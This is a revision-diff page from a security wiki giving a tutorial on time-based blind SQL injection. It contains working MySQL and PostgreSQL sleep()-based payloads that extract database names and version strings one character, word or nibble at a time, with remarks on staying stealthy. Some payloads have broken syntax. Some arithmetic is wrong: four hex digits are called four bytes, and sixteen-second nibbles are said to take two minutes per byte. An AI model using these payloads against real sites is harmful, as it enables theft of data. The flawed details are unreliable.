Questions about this topic? Sign up to ask in the talk tab.
Difference between revisions of "SQL injection/Blind/Extraction/Timing"
From NetSec
(Created page with "{{warning|<i>If not on a '''LAN''' when this technique is utilized, buggy and unpredictable results '''will''' be attained.</i>}} This testing is ideal when''': * It is taking pl...") |
|||
Line 13: | Line 13: | ||
</source>}} | </source>}} | ||
:'''By timing these (in seconds) the integer value of the [[ascii]] code of the first character of the database will be attained.''' | :'''By timing these (in seconds) the integer value of the [[ascii]] code of the first character of the database will be attained.''' | ||
+ | |||
+ | This attack can also retrieve varying sizes of data, for example, a full word could be retrieved or a nibble at a time. The time required to perform these attacks can vary, retrieving a full word would take upto 65,535 seconds (18 hours) but would only require a single query per four bytes. A nibble would only require up to 16 seconds per nibble, or two minutes to retrieve the byte, but requires more requests and is much less stealthy. To retrieve a full word the request would be: | ||
+ | |||
+ | {{code|text=<source lang="sql"> | ||
+ | id=1 and sleep(conv(substring(hex(version()),1,4),16,10)) | ||
+ | </source>}} | ||
+ | |||
+ | For a nibble: | ||
+ | {{code|text=<source lang="sql"> | ||
+ | id=1 and sleep(conv(substring(hex(version),1,1),16,10)) | ||
+ | </source>}} |
Revision as of 18:36, 19 November 2012
If not on a LAN when this technique is utilized, buggy and unpredictable results will be attained. |
This testing is ideal when:
- It is taking place on a relatively low latency network
- There is access to a consistent latency and the remote page has a consistent load time (may not vary by more than 0.5 seconds)
Single byte exfiltration takes less queries to perform the same results, and leaves a smaller log footprint.
- A timer will need to be used to see how long it takes the remote server to serve the page.
Examples of timing-based single-byte exfiltration:
- Exfiltrating the first character of the database name in a single request:
AND sleep(ascii(SUBSTRING(@@DATABASE,1,1))) -- MySQL AND pg_sleep(ascii(SUBSTRING(current_database,1,1))) IS NULL -- PostgreSQL |
- By timing these (in seconds) the integer value of the ascii code of the first character of the database will be attained.
This attack can also retrieve varying sizes of data, for example, a full word could be retrieved or a nibble at a time. The time required to perform these attacks can vary, retrieving a full word would take upto 65,535 seconds (18 hours) but would only require a single query per four bytes. A nibble would only require up to 16 seconds per nibble, or two minutes to retrieve the byte, but requires more requests and is much less stealthy. To retrieve a full word the request would be:
id=1 AND sleep(conv(SUBSTRING(hex(version()),1,4),16,10)) |
For a nibble:
id=1 AND sleep(conv(SUBSTRING(hex(version),1,1),16,10)) |